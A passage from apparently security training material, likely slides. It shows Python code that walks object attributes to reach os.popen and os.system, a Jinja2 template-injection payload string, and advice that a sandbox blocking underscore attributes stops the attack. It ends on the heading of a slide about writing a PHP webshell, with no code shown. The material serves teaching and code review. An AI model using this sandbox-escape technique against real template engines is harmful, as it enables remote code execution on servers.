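    """Return the os.popen function purely through the attribute walk (not called)."""
    cls, g = find_module_globals("os", "popen")
    return g["popen"] if g else None


def template_payload():
    """The same first step written as a Jinja2-style expression (a string only)."""
    return "{{ [].__class__.__mro__[1].__subclasses__() }}"


if __name__ == "__main__":
    cls, g = find_module_globals()
    print(cls, "->", g["__name__"], "->", g["system"])
```

In a Jinja2 template the same walk starts as template_payload() shows; a sandbox that refuses attribute names beginning with an underscore (Jinja2's SandboxedEnvironment does) stops it at the very first step, which is why "is the sandbox actually enabled?" is the question to ask when reviewing template code that renders user input.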

Slide 77

How to write a PHP webshell
• Trivial
• A little confusing
• Here is my favorite, sharing it with you